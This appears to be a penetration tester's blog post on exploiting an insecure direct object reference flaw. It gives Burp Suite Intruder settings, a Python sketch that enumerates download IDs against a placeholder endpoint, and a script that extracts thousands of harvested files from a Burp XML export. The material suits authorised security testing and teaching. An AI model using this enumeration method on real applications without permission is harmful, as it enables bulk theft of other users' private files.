I recently found an Insecure Direct Object Reference (IDOR) vulnerability in a web application that I was testing. By incrementing or decrementing an ID value, I could download any file in the application, even though they were not listed for download in the user interface.

A simple way to exploit this kind of vulnerability is with Burp Suite Intruder.  To do this, first send a request to Intruder by right-clicking on it and choosing “Send to Intruder.” Within Intruder, use the “Sniper” attack type and place the § markers around the ID value. For payloads, choose the payload type of “Numbers,” enter a starting number and an ending number, and set the step to “1” or “-1” depending on whether you want to increment or decrement from your starting position.  Run the attack.  This is a simple set-up for a basic IDOR; sometimes it is a bit more complicated (e.g. CSRF tokens).
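The same Sniper-with-Numbers setup can be sketched as a short script. The endpoint, parameter name, and `fetch` callable below are hypothetical stand-ins for illustration, not the actual target:

```python
# Hypothetical endpoint; the real application and parameter name differ.
BASE_URL = "https://example.com/download?id={}"

def payload_ids(start, stop, step=1):
    """Mirror Intruder's 'Numbers' payload: every ID from start to stop
    inclusive, stepping by 1 to increment or -1 to decrement."""
    return range(start, stop + (1 if step > 0 else -1), step)

def run_attack(fetch, start, stop, step=1):
    """Sniper-style loop: request each candidate ID and keep those
    where fetch() reports a hit (e.g. a downloadable file)."""
    return [i for i in payload_ids(start, stop, step)
            if fetch(BASE_URL.format(i))]
```

Here `fetch` would wrap the actual HTTP request and return whether the response looked like a valid download.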

For the app I was testing, a valid request would return a file for download, and the response would include the HTTP header “Content-Disposition: attachment;”.  This helped me separate valid IDs from invalid ones, as invalid requests would not return that header.  The output can be sorted on this by going to the “Options” tab, using “Grep – Match,” and adding “attachment” as a value.  The results then gain a column which I could use to sort on.
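Outside of Burp, the same “Grep – Match” check is a one-liner; a minimal sketch, assuming the response headers are available as a dict (header-name casing may vary):

```python
def looks_like_download(headers):
    """Return True when a response advertises a file attachment,
    mirroring the Intruder "Grep - Match" rule on "attachment"."""
    # Normalise header names to lowercase before matching
    lowered = {k.lower(): v for k, v in headers.items()}
    return "attachment" in lowered.get("content-disposition", "")
```

For example, `looks_like_download({"Content-Disposition": 'attachment; filename="report.pdf"'})` is a hit, while a plain HTML error page is not.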

After enumerating roughly 5,000 files, I wanted to download them.  I looked for a solution native to Burp Suite, but did not find one.  Right-clicking on a response and selecting “Copy to file” would allow me to save the response, however I could only do one at a time, and the file would also include all of the HTTP headers, whereas I only wanted the response body.  Burp Suite also has the option of “Save item,” which saves an XML file designed to be ingested by Burp.  This XML file contains all the information you see in the UI, including the request, response, and associated metadata.  When items are selected in bulk, you can right-click and choose “Save selected items,” which writes all of the requests and responses into a single XML file.
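The exported XML has roughly the following shape (simplified here; Burp includes further metadata elements per item), with the raw request and response stored as base64-encoded CDATA:

```xml
<items>
  <item>
    <url><![CDATA[https://example.com/download?id=1]]></url>
    <request base64="true"><![CDATA[...]]></request>
    <response base64="true"><![CDATA[...]]></response>
  </item>
  <!-- one <item> per selected request/response pair -->
</items>
```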

In my case, I ended up with a 1.5GB XML file.  The next task was to extract the files contained within it.  I ended up writing a Python script to do it, shown below:

import base64

import bs4
from bs4 import BeautifulSoup

# Import the Burp file
path = 'FILEPATH'
with open(path, 'r') as burp_file:
    xml = burp_file.read()

# Parse the XML with BeautifulSoup
parsed = BeautifulSoup(xml, "html.parser")

# Search through each item in the file
for document in parsed.find_all('item'):
    try:
        # Extract the CDATA content within an item response
        # https://stackoverflow.com/questions/2032172/how-can-i-grab-cdata-out-of-beautifulsoup
        based = document.response.find(text=lambda tag: isinstance(tag, bs4.CData)).string.strip()
        # Decode the base64-encoded response
        data = base64.b64decode(based)
        # Strip off the HTTP headers, leaving only the body
        content = data.split(b'\r\n\r\n', 1)[1]
        # Extract the filename from the HTTP header, replacing any
        # slashes so it is safe to use as a filename
        stringed = str(data)
        filename = stringed.split('filename="')[1].split('"')[0].replace("/", "-")
        # Write the body to a file using the extracted filename
        with open("/tmp/" + filename, "wb") as f:
            f.write(content)
    # If something goes wrong, print the exception and move on
    except Exception as e:
        print(e)

This script goes through each item and extracts each response.  It strips out the body of the response and, using the filename present in the Content-Disposition header, writes it to a new file on disk under the original filename.  The script can also be located on Github here.
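The header-stripping and filename extraction can be exercised in isolation on a synthetic response; the helper name and sample bytes below are my own, not part of the script:

```python
def extract_body_and_filename(data: bytes):
    """Split a raw HTTP response into the filename advertised in its
    Content-Disposition header and its body, mirroring the logic in
    the script above."""
    headers, body = data.split(b"\r\n\r\n", 1)
    filename = (headers.decode("latin-1")
                .split('filename="')[1].split('"')[0]
                .replace("/", "-"))
    return filename, body

# A minimal fake response, like those Burp stores base64-encoded
raw = (b"HTTP/1.1 200 OK\r\n"
       b'Content-Disposition: attachment; filename="reports/q1.pdf"\r\n'
       b"\r\n"
       b"%PDF-1.4 ...")
print(extract_body_and_filename(raw))  # -> ('reports-q1.pdf', b'%PDF-1.4 ...')
```

Note the slash in `reports/q1.pdf` becoming a dash, so a hostile filename cannot escape the output directory.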

This could also be done in other ways, but Burp Suite is probably still the best option, as session macros can be used to deal with CSRF tokens quite easily.